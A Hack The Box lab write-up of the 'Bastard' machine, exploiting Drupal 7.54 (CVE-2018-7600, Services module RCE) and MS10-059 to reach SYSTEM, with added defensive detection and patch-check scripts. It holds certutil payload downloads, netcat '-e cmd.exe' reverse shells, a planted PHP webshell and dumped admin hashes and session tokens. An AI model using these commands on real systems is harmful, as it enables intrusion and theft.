
# HTB - Bastard

![Bastard](/files/-M257KblgprS9UlcMW6i)

## Getting Root:

1. Enumerating port 80 shows the box is running **Drupal 7.54** which is vulnerable to remote code execution
2. After getting a low privilege shell, we escalate privilege to **SYSTEM** using **MS10-059**

### **Tools Used:**

**`nmap, curl, windows-exploit-suggester.py, certutil`**

## Nmap

```
nmap -sC -sV -p 80,135,49154 -oA Bastard.nmap 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 14:56 EDT
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds

```

## Enumerating Port 80

Checking **`robots.txt`**:

```
curl -s http://10.10.10.9/robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

```

Checking **`CHANGELOG.TXT`** reveals the version of **Drupal** to be **7.54**:

```
curl -s http://10.10.10.9/CHANGELOG.TXT | head -n 20

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
  (API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
  type configuration page.
- File validation error message is now removed after subsequent upload of valid
  file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.

```
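A defender's version check for the fingerprinting step above, added here as an example and not part of the original writeup: it parses the release headers of an exposed `CHANGELOG.txt` and compares the newest one against 7.58, the release that fixed CVE-2018-7600 (the "<= 7.57" bound the exploit banner prints). The changelog text is constructed from the excerpt above; nothing is fetched.

```python
import re

# Constructed excerpt of an exposed Drupal 7 CHANGELOG.txt, modelled on the file
# shown above (newest release first). Sample data only; nothing is fetched.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Numerous bug fixes.

Drupal 7.53, 2016-12-07
-----------------------
- Numerous bug fixes.
"""

# Drupal 7.58 (2018-03-28) shipped the fix for CVE-2018-7600 (SA-CORE-2018-002).
FIXED_IN = (7, 58, 0)

# Release headers look like "Drupal 7.54, 2017-02-01"; Drupal 8 adds a third component.
RELEASE_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?, (\d{4}-\d{2}-\d{2})", re.M)


def parse_releases(text):
    """Return [(version_tuple, release_date)] for every release header in the file."""
    releases = []
    for m in RELEASE_RE.finditer(text):
        major, minor, patch, date = m.groups()
        releases.append(((int(major), int(minor), int(patch or 0)), date))
    return releases


def installed_version(text):
    """The highest release header in the file is the version the site is running."""
    releases = parse_releases(text)
    return max(releases)[0] if releases else None


def format_version(v):
    """Render (7, 54, 0) as '7.54' and (8, 5, 1) as '8.5.1'."""
    return f"{v[0]}.{v[1]}" + (f".{v[2]}" if v[2] else "")


def assess(text, fixed_in=FIXED_IN):
    """Return (version_string, vulnerable); (None, None) if no Drupal changelog is found."""
    v = installed_version(text)
    if v is None:
        return None, None
    return format_version(v), v < fixed_in
```

The same parser doubles as an inventory check: any site that still serves `CHANGELOG.txt` publicly hands out this version string to anyone who asks, so blocking the file is worth doing alongside patching.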

## Exploit

Found the following exploit for Drupal 7.54 on GitHub.

{% embed url="https://github.com/pimps/CVE-2018-7600" %}

```bash
# On my kali box
python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "ping 10.10.14.3"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-i725q67HTHWEJND2D2j81b32GnpnfR0-FrPu9EtnaHs
[*] Triggering exploit to execute: ping 10.10.14.3

Pinging 10.10.14.3 with 32 bytes of data:
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63

Ping statistics for 10.10.14.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 38ms, Maximum = 38ms, Average = 38ms



# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
16:06:52.106926 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 5, length 40
16:06:52.106955 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 5, length 40
16:06:53.100795 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 6, length 40
16:06:53.100823 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 6, length 40
16:06:54.099473 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 7, length 40
16:06:54.099566 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 7, length 40
16:06:55.097763 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 8, length 40
16:06:55.097801 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 8, length 40

```

That confirms we have remote command execution.

## Getting a shell

```bash
 python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -f -split http://10.10.14.3/nc.exe"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-YTR40kc-mSMxpyUSUJ2dLSE4dJNb9wwxn-iADCFwEK0
[*] Triggering exploit to execute: certutil -urlcache -f -split http://10.10.14.3/nc.exe
****  Online  ****
  0000  ...
  e800
CertUtil: -URLCache command completed successfully.


# I see the box downloaded the executable
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.9 - - [10/Mar/2020 16:12:38] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.9 - - [10/Mar/2020 16:12:38] "GET /nc.exe HTTP/1.1" 200 -



# triggered the reverse shell
python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "nc.exe 10.10.14.3 9001 -e cmd.exe"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-vKZAyRgmhvQT0vwjVnFd7o8_kDB1RJozNGyygzMCcGY
[*] Triggering exploit to execute: nc.exe 10.10.14.3 9001 -e cmd.exe




# Got a shell!!!
rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 59893
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>


```
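The chain above (IIS worker process running `cmd.exe`, `certutil -urlcache` pulling a binary, `nc.exe -e` calling back) is exactly what process-creation telemetry catches on the defending side. The following detector is an added example, not part of the writeup: it walks a list of constructed Sysmon-style process events, checks each process's ancestry for a web worker, and flags the three behaviours. Event fields, PIDs and paths are constructed sample data.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon Event ID 1 / Windows 4688 style),
# modelled on the chain shown above: w3wp.exe -> cmd.exe -> certutil -> nc.exe.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 600,  "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmd": r"c:\windows\system32\inetsrv\w3wp.exe -ap DefaultAppPool"},
    {"pid": 3104, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c certutil -urlcache -f -split http://10.10.14.3/nc.exe"},
    {"pid": 3120, "ppid": 3104, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -f -split http://10.10.14.3/nc.exe"},
    {"pid": 3301, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c nc.exe 10.10.14.3 9001 -e cmd.exe"},
    {"pid": 3310, "ppid": 3301, "image": r"C:\inetpub\drupal-7.54\nc.exe",
     "cmd": r"nc.exe 10.10.14.3 9001 -e cmd.exe"},
    {"pid": 4000, "ppid": 800,  "image": r"C:\Windows\System32\svchost.exe",
     "cmd": r"svchost.exe -k netsvcs"},   # benign noise, must not fire
]

WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
NETCAT = {"nc.exe", "ncat.exe", "netcat.exe"}
URL_DOWNLOAD = re.compile(r"-urlcache\b.*https?://", re.I)   # certutil as a downloader
NC_EXEC = re.compile(r"\s-e\s")                               # netcat -e <program>


def basename(path):
    return PureWindowsPath(path).name.lower()


def has_web_ancestor(event, by_pid, max_depth=8):
    """Walk the parent chain and report whether a web worker is an ancestor."""
    ppid = event["ppid"]
    for _ in range(max_depth):
        parent = by_pid.get(ppid)
        if parent is None:
            return False
        if basename(parent["image"]) in WEB_WORKERS:
            return True
        ppid = parent["ppid"]
    return False


def detect(events):
    """Return (pid, rule) findings in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        if name in WEB_WORKERS:
            continue
        if name in SHELLS and has_web_ancestor(e, by_pid):
            findings.append((e["pid"], "web worker spawned a shell"))
        if name == "certutil.exe" and URL_DOWNLOAD.search(e["cmd"]):
            findings.append((e["pid"], "certutil used as a downloader"))
        if name in NETCAT and NC_EXEC.search(e["cmd"]):
            findings.append((e["pid"], "netcat -e reverse shell"))
    return findings
```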

## Privilege Escalation

Output of **`windows-exploit-suggester.py`** run against the target's `systeminfo` output:

```bash
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

```

## Got SYSTEM using MS10-059

Downloaded the exploit to the target:

```bash
certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe
****  Online  ****
  000000  ...
  0bf800
CertUtil: -URLCache command completed successfully.

C:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.3 9002
MS10-059.exe 10.10.14.3 9002
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

```

Got a shell with SYSTEM privileges:

```bash
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.9 - - [10/Mar/2020 16:19:34] "GET /MS10-059.exe HTTP/1.1" 200 -
10.10.10.9 - - [10/Mar/2020 16:19:35] "GET /MS10-059.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
root@kdeali:~/HackTheBox/Bastard/smb# rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 59897
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system


```

Output of **`systeminfo`** on the target:

```
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 
System Boot Time:          10/3/2020, 8:39:41 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.562 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.590 MB
Virtual Memory: In Use:    505 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

```
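The line that matters in that output is `Hotfix(s): N/A` on build 7600: an unpatched Server 2008 R2 RTM, which is why a 2010 bulletin still works. As an added example (not part of the writeup), the script below parses `systeminfo` text, including the multi-line `[01]: KB...` list a patched host prints, and reports which of the bulletins named by the exploit suggester are missing. Both `systeminfo` samples are constructed; the bulletin-to-KB mapping uses the numbers in parentheses in the suggester output above, with the simplifying assumption that the per-platform package KB matches the bulletin KB.

```python
import re

# Constructed systeminfo output modelled on the box above (build 7600, no hotfixes).
UNPATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed counterexample to exercise the multi-line hotfix list.
PATCHED = """\
Host Name:                 SAMPLE-PATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB2778930
"""

# Bulletin -> KB as printed by the exploit suggester above. Assumption: the package
# KB that systeminfo lists equals the bulletin KB (they can differ per platform).
REQUIRED = {"MS10-059": "KB982799", "MS11-011": "KB2393802", "MS13-005": "KB2778930"}

FIELD_RE = re.compile(r"^(\S[^:]*):\s*(.*)$")     # "Field Name:   value"
ITEM_RE = re.compile(r"^\s+\[\d+\]:\s*(\S+)")      # "   [01]: KB982799"


def parse_systeminfo(text):
    """Return {field: value}; list fields also get '<field> items': [values]."""
    info, current = {}, None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:                       # FIELD_RE requires a non-space first char
            current = m.group(1).strip()
            info[current] = m.group(2).strip()
            continue
        m = ITEM_RE.match(line)
        if m and current:
            info.setdefault(current + " items", []).append(m.group(1))
    return info


def missing_patches(text, required=REQUIRED):
    """Return {bulletin: KB} for every required KB absent from the hotfix list."""
    info = parse_systeminfo(text)
    installed = {kb.upper() for kb in info.get("Hotfix(s) items", [])}
    return {b: kb for b, kb in required.items() if kb.upper() not in installed}
```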

## Another Way To Do the Box:

```bash
# searchsploit drupal 7
Exploit Title:
Drupal 7.x Module Services - Remote Code Execution

Exploit Path:
exploits/php/webapps/41564.php
```

I tried running this exploit but kept getting errors at execution. For this exploit to work, you might need to install **`php-curl`**:

```bash
apt install php-curl
```

From **`gobuster`** I was able to see **`/rest`** in the output. So I used curl to check it out.

```bash
curl -s http://10.10.10.9/rest
Services Endpoint "rest_endpoint" has been setup successfully.
```

With that information, I modified the **php** exploit as follows (I also had to fix a few syntax errors, which basically just needed to be commented out):

```php
$url = 'http://10.10.10.9';
#$endpoint_path = '/rest_endpoint';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
```

### Running the exploit

```bash
php 41564.php 
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics 
# Website: https://www.ambionics.io/blog/drupal-services-module-rce


#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php
```

### Got two files

1. **session.json**
2. **user.json**

```bash
cat user.json 
{
    "uid": "1",
    "name": "admin",
    "mail": "drupal@hackthebox.gr",
    "theme": "",
    "created": "1489920428",
    "access": "1583872959",
    "login": 1583873660,
    "status": "1",
    "timezone": "Europe\/Athens",
    "language": "",
    "picture": null,
    "init": "drupal@hackthebox.gr",
    "data": false,
    "roles": {
        "2": "authenticated user",
        "3": "administrator"
    },
    "rdf_mapping": {
        "rdftype": [
            "sioc:UserAccount"
        ],
        "name": {
            "predicates": [
                "foaf:name"
            ]
        },
        "homepage": {
            "predicates": [
                "foaf:page"
            ],
            "type": "rel"
        }
    },
    "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}
```

```bash
cat session.json 
{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "Dj8-dy-6rEzLuEOdOvMXqf8FQJNsk2P1ZVzhbH5K-bc",
    "token": "XvZ60x9iDr2E4nsl4DzbpW_2tKEkbMTE45CFH7J2PEY"
}
```

### Login as admin

I used the Firefox plugin **Cookie Quick Manager** and added the cookie from the session.json file

![](/files/-M25HdvJ2nruAcDzTeOc)

Refresh the page **`http://10.10.10.9`**.

![](/files/-M25I76w5Clq9wNUh4e5)

After hitting refresh on the site, you should be logged in as Admin

![](/files/-M25MIncPM_FKCH6dYIZ)

Go to Modules and enable PHP Filter.

![](/files/-M25MY-gzugjXFjmRyqD)

Scroll all the way to the bottom and click **Save Configuration**.

![](/files/-M25MeYkYxfsknfaTCfe)

### Getting a reverse shell

Click on "**Add Content**"

![](/files/-M25RIe81yGIwjegaFAH)

Add "**Basic Page**"

![](/files/-M25RZ9y2MM2f0du2V8z)

### Add your php code

Add a title, your PHP code and change the Text format to PHP code. Then scroll all the way to the bottom and click Save.

![](/files/-M25S7zwMa6YoNRPQ2y8)

In my case, the PHP code I used is a webshell I got from GitHub. This webshell allows me to execute any commands on the target and even upload files, such as the compiled binary for **MS10-059** we used in method 1, to get a shell as SYSTEM.

![](/files/-M25SeQsKb19-uwQURjE)

![](/files/-M25TMtT50vcId4KrVHA)

![](/files/-M25T_cSzPJKOPETizFB)

![](/files/-M25UFc-xUuubrK3Mzpj)

### Getting the reverse shell

![](/files/-M25UkaxIAu19h3YsuF4)

### Got a shell as SYSTEM

```bash
rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 60226
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>


```
